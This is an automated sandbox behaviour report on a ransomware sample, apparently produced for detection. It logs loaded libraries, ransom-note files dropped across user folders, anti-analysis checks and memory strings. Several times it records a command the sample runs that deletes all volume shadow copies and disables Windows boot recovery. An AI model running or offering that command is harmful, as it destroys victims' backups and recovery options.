Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: RQzHm5vLxs.exe

ReversingLabs: Detection: 92%

Source: RQzHm5vLxs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RQzHm5vLxs.exe C:\Users\user\Desktop\RQzHm5vLxs.exe
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures	Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

File created: c:\users\985drm9-readme.txt

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

File created: C:\Users\user\AppData\Local\Temp\jyd4327.bmp

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/211@6/5

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D93E53 GetDriveTypeW,GetDiskFreeSpaceExW,

0_2_00D93E53

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D9457F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,

0_2_00D9457F

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\FDC9FA6E-8257-3E98-2600-E72145612F09

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

File created: c:\program files\985drm9-readme.txt

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Directory created: c:\program files\985drm9-readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Directory created: c:\program files\37db623e.lock			Jump to behavior

Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: RQzHm5vLxs.exe, 00000000.00000003.2211440830.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: RQzHm5vLxs.exe, 00000000.00000003.2216942802.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2211386957.0000000003BE9000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344505998.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215318961.0000000003BE3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928315056.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\T source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2216977253.0000000002589000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158945262.0000000002583000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344713671.0000000002589000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\g5 source: RQzHm5vLxs.exe, 00000000.00000003.2162546986.0000000003B89000.00000004.00000020.00020000.00000000.sdmp

Source: RQzHm5vLxs.exe

Static PE information: section name: .yesewt

Persistence and Installation Behavior

Uses bcdedit to modify the Windows boot settings

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures			Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: C:\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\$winreagent\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\program files\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\program files (x86)\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\recovery\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\$winreagent\scratch\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\desktop\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\documents\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\downloads\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\favorites\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\links\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\music\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\onedrive\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\pictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\saved games\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\videos\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\.ms-ad\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\3d objects\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\contacts\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\downloads\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\favorites\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\links\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\music\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\onedrive\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\pictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\recent\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\saved games\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\searches\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\videos\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\accountpictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\desktop\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\documents\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\downloads\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\libraries\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\music\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\pictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\videos\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\bpmlnobvsb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\dvwhkmnfnn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\ltkmybseyz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\nebfqqywps\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\onbqclyspu\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\qncycdfijj\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\ummbdneqbn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\uoojjozirh\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\vlzdgukutz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\xzxhavgrag\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\zbedcjpbey\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\ztgjilhxqb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\bpmlnobvsb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\dvwhkmnfnn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\ltkmybseyz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\nebfqqywps\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\onbqclyspu\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\qncycdfijj\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\ummbdneqbn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\uoojjozirh\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\vlzdgukutz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\xzxhavgrag\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\zbedcjpbey\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\ztgjilhxqb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\favorites\links\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\pictures\camera roll\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\pictures\saved pictures\985drm9-readme.txt	Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-3519

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D94A6C

0_2_00D94A6C

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe TID: 6236

Thread sleep count: 10000 > 30

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-3742

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D949C2 rdtsc

0_2_00D949C2

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Window / User API: threadDelayed 10000

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-3731

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D92E6D GetSystemInfo,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,UnmapViewOfFile,DeleteFileW,

0_2_00D92E6D

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D961AD FindFirstFileW,FindNextFileW,FindClose,

0_2_00D961AD

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

API call chain: ExitProcess graph end node

graph_0-3559

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifest	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifest	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifest	Jump to behavior

Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\f\'\|Y
Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\=
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8\:
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5\z
Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2135529974.0000000003BCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\r\5
Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5\q
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\r\+?Z
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96\
Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.0000000002586000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\
Source: RQzHm5vLxs.exe, 00000000.00000003.2062832117.0000000002593000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\
